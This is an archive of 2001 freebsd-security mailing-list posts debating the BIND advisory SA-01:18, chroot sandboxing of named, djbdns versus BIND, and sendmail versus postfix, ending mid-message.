earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id E08CB37B6A8 for ; Wed, 31 Jan 2001 17:54:36 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f111sYE23275; Wed, 31 Jan 2001 17:54:34 -0800 (PST) (envelope-from dillon) Date: Wed, 31 Jan 2001 17:54:34 -0800 (PST) From: Matt Dillon Message-Id: <200102010154.f111sYE23275@earth.backplane.com> To: Chris Johnson Cc: Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl> <20010131200142.A90211@palomine.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :Yes! Why work around BIND limitiations and do all this sandboxing to try to :limit the damage it can do to you, when there's a better alternative? : :Chris Yah, that's the ticket... kinda like wu-ftpd was created because existing ftpd's weren't up to snuff, except wu-ftpd turned out to have literally dozens of rootable exploits. Just because BIND's loopholes are advertised doesn't mean that other DNS servers don't have loopholes. While I agree that some of the newer ones almost certainly have *fewer* rootable loopholes, maybe, I don't see them as improving my risk factors much. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 18: 2:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from shemp.palomine.net (shemp.palomine.net [205.198.88.200]) by hub.freebsd.org (Postfix) with SMTP id 279DC37B69E for ; Wed, 31 Jan 2001 18:02:35 -0800 (PST) Received: (qmail 91682 invoked by uid 1000); 1 Feb 2001 02:02:33 -0000 Date: Wed, 31 Jan 2001 21:02:33 -0500 From: Chris Johnson To: Matt Dillon Cc: Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010131210232.A91629@palomine.net> References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl> <20010131200142.A90211@palomine.net> <200102010154.f111sYE23275@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200102010154.f111sYE23275@earth.backplane.com>; from dillon@earth.backplane.com on Wed, Jan 31, 2001 at 05:54:34PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 31, 2001 at 05:54:34PM -0800, Matt Dillon wrote: > :Yes! Why work around BIND limitiations and do all this sandboxing to try to > :limit the damage it can do to you, when there's a better alternative? > : > :Chris > > Yah, that's the ticket... kinda like wu-ftpd was created because existing > ftpd's weren't up to snuff, except wu-ftpd turned out to have literally > dozens of rootable exploits. > > Just because BIND's loopholes are advertised doesn't mean that other > DNS servers don't have loopholes. While I agree that some of the newer > ones almost certainly have *fewer* rootable loopholes, maybe, I don't > see them as improving my risk factors much. Except that djbdns was written by Dan Bernstein (of qmail fame). He doesn't know how to write rootable software. Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 18: 3:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 82F0837B69E for ; Wed, 31 Jan 2001 18:03:39 -0800 (PST) Received: (qmail 1146 invoked by uid 1000); 1 Feb 2001 02:03:38 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Feb 2001 02:03:38 -0000 Date: Wed, 31 Jan 2001 20:03:38 -0600 (CST) From: Mike Silbersack To: Matt Dillon Cc: Chris Johnson , Przemyslaw Frasunek , Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <200102010154.f111sYE23275@earth.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 Jan 2001, Matt Dillon wrote: > :Yes! Why work around BIND limitiations and do all this sandboxing to try to > :limit the damage it can do to you, when there's a better alternative? > : > :Chris > > Yah, that's the ticket... kinda like wu-ftpd was created because existing > ftpd's weren't up to snuff, except wu-ftpd turned out to have literally > dozens of rootable exploits. > > Just because BIND's loopholes are advertised doesn't mean that other > DNS servers don't have loopholes. While I agree that some of the newer > ones almost certainly have *fewer* rootable loopholes, maybe, I don't > see them as improving my risk factors much. > > -Matt Heh, that's what I said to myself after 8.2.2-P5 came out, so I stopped using djbdns and switched back to bind. After the recent batch of BIND bugs, I've learned my lesson. I guess I should give BIND 9 a chance, though. After all, all the important holes in BIND have been parts of the dnssec code, not parts of the core BIND functionality. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 18:14:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id D217E37B4EC for ; Wed, 31 Jan 2001 18:14:03 -0800 (PST) Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id VAA74294; Wed, 31 Jan 2001 21:13:53 -0500 (EST) Date: Wed, 31 Jan 2001 21:13:52 -0500 (EST) From: To: Chris Johnson Cc: Matt Dillon , Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <20010131210232.A91629@palomine.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 Jan 2001, Chris Johnson wrote: > Except that djbdns was written by Dan Bernstein (of qmail fame). He doesn't > know how to write rootable software. If I can.. get in a .... few words between... fits.. of.. laughter. Can we now kill this thread since its reached the bottom of the barrel clue wise? ============================================================================= -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas Home: scanner@deceptively.shady.org | http://open-systems.net ============================================================================= WINDOWS: "Where do you want to go today?" LINUX: "Where do you want to go tommorow?" BSD: "Are you guys coming or what?" ============================================================================= irc.openprojects.net #FreeBSD -Join the revolution! ICQ: 20016186 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 18:16:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from dt051n37.san.rr.com (dt051n37.san.rr.com [204.210.32.55]) by hub.freebsd.org (Postfix) with ESMTP id 4D21E37B4EC for ; Wed, 31 Jan 2001 18:16:35 -0800 (PST) Received: from slave (Studded@slave [10.0.0.1]) by dt051n37.san.rr.com (8.9.3/8.9.3) with ESMTP id SAA20073; Wed, 31 Jan 2001 18:15:50 -0800 (PST) (envelope-from DougB@gorean.org) Date: Wed, 31 Jan 2001 18:15:50 -0800 (PST) From: Doug Barton X-X-Sender: To: Alfred Perlstein Cc: Brian Behlendorf , Roman Shterenzon , Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <20010131145423.H26076@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 Jan 2001, Alfred Perlstein wrote: > Since named supports a command line option for chroot as well > as user flags (-t) it would be trivial to have it the defaultt. Actually, it's not trivial to do the chroot version properly. There are several files, directories, and one device that have to be created in the chroot environment. Also, /etc/ is not a good choice for the chroot, it really should be something like /usr/named, or /usr/local/named since the quantity of zone files could be quite large, and variable in nature. > It's pretty much a toss-up between usability and security. When done properly (with appropriate compiled-in defaults) the only functionality you lose is the ability to bind new interfaces while named is running. As Matt pointed out, this "feature" is of dubious value at best. > I guess this is the final blow for me, and I think we should > run bind in a sandbox at this point, I'm just worried about > confusing newbies who wish to set it up. > > If anyone has a proposal on doing it by default that doesn't > impact ease of use (or if already doesn't impact it) then I'm > for it. Jeroen and I are kicking around some ideas. I'm thinking of a make.conf variable that will specify the location of the chroot dir. Something like BIND_CHROOT=/usr/local/named. Questions to be resolved are; location, default to on or off, etc. So far there is pretty good support for at least providing the option to do this in the base, so I think it will happen sometime "soon," depending on how soon the two of us (or someone else) can get to it. > What I'm worrying about specifically is ndc and other utilities > basically are unix domain sockets not in the expected place all of > sudden? That's one of the things you compile in. Let's say that you want your chroot to be /usr/local/named. You set DESTRUN in the bind makefile to /usr/local/named/var so named knows where to write it's FIFO when it starts up, and you make that var directory rw for the bind user. QED. BTW, just running with -u bind -g bind does not constitute "running in a sandbox." It does help to have bind drop privs, but the chroot stuff is what constitutes a true sandbox. Doug -- "Pain heals. Chicks dig scars. Glory . . . lasts forever." -- Keanu Reeves as Shane Falco in "The Replacements" Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 18:24:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from shemp.palomine.net (shemp.palomine.net [205.198.88.200]) by hub.freebsd.org (Postfix) with SMTP id D6C4737B503 for ; Wed, 31 Jan 2001 18:24:35 -0800 (PST) Received: (qmail 92149 invoked by uid 1000); 1 Feb 2001 02:24:34 -0000 Date: Wed, 31 Jan 2001 21:24:34 -0500 From: Chris Johnson To: scanner@jurai.net Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010131212434.A92130@palomine.net> References: <20010131210232.A91629@palomine.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from scanner@jurai.net on Wed, Jan 31, 2001 at 09:13:52PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 31, 2001 at 09:13:52PM -0500, scanner@jurai.net wrote: > On Wed, 31 Jan 2001, Chris Johnson wrote: > > > Except that djbdns was written by Dan Bernstein (of qmail fame). He doesn't > > know how to write rootable software. > > If I can.. get in a .... few words > between... fits.. of.. laughter. Can we now kill this thread since its > reached the bottom of the barrel clue wise? Fine. Continue to use BIND at your own peril. Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 18:34:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 069D837B69F for ; Wed, 31 Jan 2001 18:33:55 -0800 (PST) Received: (qmail 1195 invoked by uid 1000); 1 Feb 2001 02:33:52 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Feb 2001 02:33:52 -0000 Date: Wed, 31 Jan 2001 20:33:52 -0600 (CST) From: Mike Silbersack To: Cc: Chris Johnson , Matt Dillon , Przemyslaw Frasunek , Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 Jan 2001 scanner@jurai.net wrote: > On Wed, 31 Jan 2001, Chris Johnson wrote: > > > Except that djbdns was written by Dan Bernstein (of qmail fame). He doesn't > > know how to write rootable software. > > If I can.. get in a .... few words > between... fits.. of.. laughter. Can we now kill this thread since its > reached the bottom of the barrel clue wise? > > ============================================================================= > -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek ROFL Two messages after your post in my inbox is a message TdR forwarded to bugtraq about ISC about pay-for-advanced info on bugs. You're right, we're silly to be advocating non-isc software. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 19:19:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from xs4some.net (CC4140-a.sneek1.fr.nl.home.com [212.120.108.75]) by hub.freebsd.org (Postfix) with ESMTP id 34F5137B69B; Wed, 31 Jan 2001 19:19:22 -0800 (PST) Received: by xs4some.net (Postfix, from userid 1000) id 4FB172C930; Thu, 1 Feb 2001 04:19:21 +0100 (CET) From: Fenix To: freebsd-security@freebsd.org Subject: sendmail vs. postfix question Date: Thu, 1 Feb 2001 04:19:20 +0100 X-Mailer: KMail [version 1.1.99] Content-Type: text/plain; charset="iso-8859-1" Cc: freebsd-questions@freebsd.org MIME-Version: 1.0 Message-Id: <01020104192002.01203@xs4some.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have a little question about sendmail vs. postfix .... Are there any known recent problms with sendmail security ? what about postfix ? Wich one of these two MTA's is more efficient for a small site concerning resource usage and speed .... If anyone can comment on this or redirect me to some doc's on the net i will appreciate it ... Thx ! Greets Fenix -- If you have to hate, hate gently .... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 19:25:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from tandem.milestonerdl.com (tandem.milestonerdl.com [204.107.138.1]) by hub.freebsd.org (Postfix) with ESMTP id 8AF2637B69B for ; Wed, 31 Jan 2001 19:25:01 -0800 (PST) Received: from tandem (tandem [204.107.138.1]) by tandem.milestonerdl.com (8.11.1/8.10.0) with ESMTP id a113PYo06935; Wed, 31 Jan 1996 21:25:34 -0600 (CST) Date: Wed, 31 Jan 1996 21:25:34 -0600 (CST) From: Marc Rassbach To: Chris Johnson Cc: Matt Dillon , Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <20010131210232.A91629@palomine.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 Jan 2001, Chris Johnson wrote: > On Wed, Jan 31, 2001 at 05:54:34PM -0800, Matt Dillon wrote: > > :Yes! Why work around BIND limitiations and do all this sandboxing to try to > > :limit the damage it can do to you, when there's a better alternative? > > :Chris > > Yah, that's the ticket... kinda like wu-ftpd was created because existing > > ftpd's weren't up to snuff, except wu-ftpd turned out to have literally > > dozens of rootable exploits. > Except that djbdns was written by Dan Bernstein (of qmail fame). He doesn't > know how to write rootable software. And you know this because? Have you done some DNA test and found that Dan Bernstein is not human and therefore unable to make mistakes? Oh, and any 'secret memos/emails' from BIND developers showing that they set out to write 'rootable' software would also be good to see. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 20:33:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from sonar.noops.org (adsl-63-195-97-84.dsl.snfc21.pacbell.net [63.195.97.84]) by hub.freebsd.org (Postfix) with ESMTP id 619AC37B4EC for ; Wed, 31 Jan 2001 20:32:49 -0800 (PST) Received: from localhost (root@localhost) by sonar.noops.org (8.9.3/8.9.3) with ESMTP id UAA58361; Wed, 31 Jan 2001 20:32:05 -0800 (PST) (envelope-from root@noops.org) Date: Wed, 31 Jan 2001 20:32:00 -0800 (PST) From: Thomas Cannon To: Marc Rassbach Cc: Chris Johnson , Matt Dillon , Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Have you done some DNA test and found that Dan Bernstein is not human and > therefore unable to make mistakes? > I think the fact that he puts his own money on the fact that there are no exploitable flaws in qmail or his DNS implementation shows an obvious commitment to proactive security. I'm sure that is all that was implied. I've a feeling the ISC isn't sending anyone a check for the bind exploit just posted to bugtraq from nobody@replay.com, or to NAI labs. It's sorta like OpenBSD -- sure, mistakes happen. They just make a hell of a lot less of them because it's part of what they are trying to achieve. Thomas To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 20:35:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from yez.hyperreal.org (gate.sp.collab.net [64.211.228.36]) by hub.freebsd.org (Postfix) with SMTP id 8FB0837B4EC for ; Wed, 31 Jan 2001 20:35:29 -0800 (PST) Received: (qmail 3993 invoked by uid 1000); 1 Feb 2001 04:36:05 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Feb 2001 04:36:05 -0000 Date: Wed, 31 Jan 2001 20:36:05 -0800 (PST) From: Brian Behlendorf X-X-Sender: To: Mike Silbersack Cc: Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 Jan 2001, Mike Silbersack wrote: > On Wed, 31 Jan 2001, Alfred Perlstein wrote: > > > If it breaks HUP, then not really. :) > > > > I'm not sure how bind handles restarts, but even if it exec(2)s over > > itself it can track the fd open for its socket and shouldn't have to > > rebind it. > > I don't see any complaints from 8.2.3 running -u bind -g bind when I HUP > it here. killall -HUP named is fine. "ndc restart" is when it restarts as root, not as -u bind. It would be nice to have ndc "know" about named_flags. Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 20:56: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from sonar.noops.org (adsl-63-195-97-84.dsl.snfc21.pacbell.net [63.195.97.84]) by hub.freebsd.org (Postfix) with ESMTP id F0FB837B4EC for ; Wed, 31 Jan 2001 20:55:49 -0800 (PST) Received: from localhost (root@localhost) by sonar.noops.org (8.9.3/8.9.3) with ESMTP id UAA00410; Wed, 31 Jan 2001 20:49:07 -0800 (PST) (envelope-from root@noops.org) Date: Wed, 31 Jan 2001 20:49:02 -0800 (PST) From: Thomas Cannon To: Marc Rassbach Cc: Chris Johnson , Matt Dillon , Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > implied. I've a feeling the ISC isn't sending anyone a check for the bind > exploit just posted to bugtraq from nobody@replay.com, or to NAI Funny, I just took a look at that bind exploit that was posted -- it has that "oh so very much a trojan" look to it. I think it's a DoS for NAI. Ouch. -t To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 21:56:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.nbrewer.com (unknown [208.42.68.70]) by hub.freebsd.org (Postfix) with ESMTP id 28F9937B491; Wed, 31 Jan 2001 21:56:15 -0800 (PST) Received: by mail.nbrewer.com (Postfix, from userid 1009) id D6C76590; Wed, 31 Jan 2001 23:56:13 -0600 (CST) Date: Wed, 31 Jan 2001 23:56:13 -0600 From: Christopher Farley To: Fenix Cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org Subject: Re: sendmail vs. postfix question Message-ID: <20010131235613.A7019@northernbrewer.com> Mail-Followup-To: Christopher Farley , Fenix , freebsd-security@freebsd.org, freebsd-questions@freebsd.org References: <01020104192002.01203@xs4some.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <01020104192002.01203@xs4some.net>; from fenix@xs4some.net on Thu, Feb 01, 2001 at 04:19:20AM +0100 Organization: Northern Brewer, St. Paul, MN Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Fenix (fenix@xs4some.net) wrote: > I have a little question about sendmail vs. postfix .... > Are there any known recent problms with sendmail security ? > what about postfix ? Sendmail is a large, monolithic, complicated program that runs as root. Historically, it has been responsible for some of the most notorious and widespread security holes on the Internet, but I don't believe there are any (known) gaping holes in it today. Sendmail configuration is complicated and arcane -- it is the subject of one of the thickest books in the O'Reilly catalog. Actually, configuring sendmail is not that bad once you understand it -- you edit a human-readable config file which is processed by the m4 macro processor to build the much less human-readable sendmail.cf file. However, if you are like I am, and infrequently make configuration changes to your mail server, it may take more than a few minutes of grepping documentation to make even a tiny change. Postfix has a different architecture, but strictly conforms to the 'sendmail api'. That is to say that Postfix is more or less designed to be a drop-in replacement for Sendmail. Postfix is actually several small, specialized daemons that do not run as root (!), which has some positive security implications. Configuration of Postfix is very easy; there is no m4 macro processing here! I have always been able to make it do what I need it to do, although my needs aren't very great. According to my ISP (visi.com), Postfix outperforms Sendmail. -- Christopher Farley www.northernbrewer.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 22:16:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from hawk.prod.itd.earthlink.net (hawk.prod.itd.earthlink.net [207.217.120.22]) by hub.freebsd.org (Postfix) with ESMTP id ACCC037B67D; Wed, 31 Jan 2001 22:15:53 -0800 (PST) Received: from pavilion (user-33qts7c.dialup.mindspring.com [199.174.240.236]) by hawk.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with SMTP id WAA24675; Wed, 31 Jan 2001 22:15:28 -0800 (PST) Message-ID: <001701c08c16$5e989140$0101a8c0@pavilion> From: "Richard Ward" To: "Christopher Farley" , "Fenix" Cc: , References: <01020104192002.01203@xs4some.net> <20010131235613.A7019@northernbrewer.com> Subject: Re: sendmail vs. postfix question Date: Thu, 1 Feb 2001 01:15:22 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That's very true. One of the features that stand out in the "Sendmail = verses Postfix" war is that Postfix doesn't "need" root. With some = modification, neither does Sendmail. Though many won't take the time to = do this, it's one of the reasons Sendmail is deemed one of the most = insecure "common" daemons. I prefer Sendmail over Postfix simply because = I was brought up on to the Internet running Sendmail, it feels more like = home. I do however have Postfix running on my local machine, and with = keeping up-to-date on mailing lists such as this, none are a huge threat = to my network. I would have to agree, doing anything in Sendmail takes some reading, = though for the basic e-mail setup, there's little need to bring out = O'Reilly. Both Sendmail and Postfix have a home on my network, I suppose = it's just how much time you want to put in to it that depicts which MTA = you will be running on your next computer. Just my two cents. -- Richard Ward, CEO richard@neonsky.net Neonsky Internet Services 877 249 6707 - US/Canada ----- Original Message -----=20 From: Christopher Farley To: Fenix Cc: ; Sent: Thursday, February 01, 2001 12:56 AM Subject: Re: sendmail vs. postfix question > Fenix (fenix@xs4some.net) wrote: >=20 > > I have a little question about sendmail vs. postfix .... > > Are there any known recent problms with sendmail security ? > > what about postfix ? >=20 > Sendmail is a large, monolithic, complicated program that runs as > root. Historically, it has been responsible for some of the most > notorious and widespread security holes on the Internet, but I > don't believe there are any (known) gaping holes in it today. > Sendmail configuration is complicated and arcane -- it is the > subject of one of the thickest books in the O'Reilly catalog. > Actually, configuring sendmail is not that bad once you understand > it -- you edit a human-readable config file which is processed by > the m4 macro processor to build the much less human-readable > sendmail.cf file. However, if you are like I am, and infrequently > make configuration changes to your mail server, it may take more than = a > few minutes of grepping documentation to make even a tiny change. >=20 > Postfix has a different architecture, but strictly conforms to the > 'sendmail api'. That is to say that Postfix is more or less designed > to be a drop-in replacement for Sendmail. Postfix is actually > several small, specialized daemons that do not run as root (!), > which has some positive security implications. Configuration of > Postfix is very easy; there is no m4 macro processing here! I have > always been able to make it do what I need it to do, although my > needs aren't very great. According to my ISP (visi.com), Postfix > outperforms Sendmail.=20 >=20 > --=20 > Christopher Farley > www.northernbrewer.com >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 23:31:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 640BA37B698 for ; Wed, 31 Jan 2001 23:31:17 -0800 (PST) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Wed, 31 Jan 2001 23:29:10 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f117UVw24081; Wed, 31 Jan 2001 23:30:31 -0800 (PST) (envelope-from cjc) Date: Wed, 31 Jan 2001 23:30:28 -0800 From: "Crist J. Clark" To: Matt Dillon Cc: Alfred Perlstein , Brian Behlendorf , Roman Shterenzon , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010131233028.S91447@rfx-216-196-73-168.users.reflex> Reply-To: cjclark@alum.mit.edu References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> <200101312305.f0VN5vJ19469@earth.backplane.com> <20010131151531.I26076@fw.wintelcom.net> <200101312327.f0VNRPv20077@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200101312327.f0VNRPv20077@earth.backplane.com>; from dillon@earth.backplane.com on Wed, Jan 31, 2001 at 03:27:25PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 31, 2001 at 03:27:25PM -0800, Matt Dillon wrote: > :> I think we can easily make it the default. > : > :If it breaks HUP, then not really. :) > : > :I'm not sure how bind handles restarts, but even if it exec(2)s over > :itself it can track the fd open for its socket and shouldn't have to > :rebind it. > > You gotta work with what you have. Bind outsmarts itself in a lot > of places, especially the stupid interface scanning/binding code. The > last thing I want it to do is hold *any* state from the previous > incarnation across a restart. Frankly, restarting is not a big deal > even if you have hundreds or thousands of domains. I always restarted > named at BEST rather then HUP it, becausing HUPing is simply too > dangerous when you make random modifications to dozens of primary > zone files out of thousands. You also loose the cache. Some people may not like that. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 23:59: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 9E84437B491 for ; Wed, 31 Jan 2001 23:58:48 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f117wlJ26496; Wed, 31 Jan 2001 23:58:48 -0800 (PST) (envelope-from dillon) Date: Wed, 31 Jan 2001 23:58:48 -0800 (PST) From: Matt Dillon Message-Id: <200102010758.f117wlJ26496@earth.backplane.com> To: "Crist J. Clark" Cc: Alfred Perlstein , Brian Behlendorf , Roman Shterenzon , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> <200101312305.f0VN5vJ19469@earth.backplane.com> <20010131151531.I26076@fw.wintelcom.net> <200101312327.f0VNRPv20077@earth.backplane.com> <20010131233028.S91447@rfx-216-196-73-168.users.reflex> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : :On Wed, Jan 31, 2001 at 03:27:25PM -0800, Matt Dillon wrote: :> :> I think we can easily make it the default. :> : :> :If it breaks HUP, then not really. :) :> : :> :I'm not sure how bind handles restarts, but even if it exec(2)s over :> :itself it can track the fd open for its socket and shouldn't have to :> :rebind it. :> :> You gotta work with what you have. Bind outsmarts itself in a lot :> of places, especially the stupid interface scanning/binding code. The :> last thing I want it to do is hold *any* state from the previous :> incarnation across a restart. Frankly, restarting is not a big deal :> even if you have hundreds or thousands of domains. I always restarted :> named at BEST rather then HUP it, becausing HUPing is simply too :> dangerous when you make random modifications to dozens of primary :> zone files out of thousands. : :You also loose the cache. Some people may not like that. :-- :Crist J. Clark cjclark@alum.mit.edu Recursive nameservers generally do not need to be HUPd or restarted. It's the nameservers handing out primary and secondary zones that usually need HUPing/restarting. Nobody in their right mind runs a primary/secondary zone server with any significant number of domains or load in recursive mode. Even the smallest ISP with any brains separates the functions out. Anyone who does -- well, they get what they deserve, and I guarentee you that the fact their cache may have to be reloaded is inconsequential relative to all the other fallout. The plain fact of the matter is that if you want reliable name service, you can't afford even to HUP the recursive nameservers (which take the brunt of your other hosts lookup load and for which there is no easy way to create redundancy in a manner that appears seemless to hosts using said server as a resolver). Even HUPing can result in a few seconds worth of glitches, 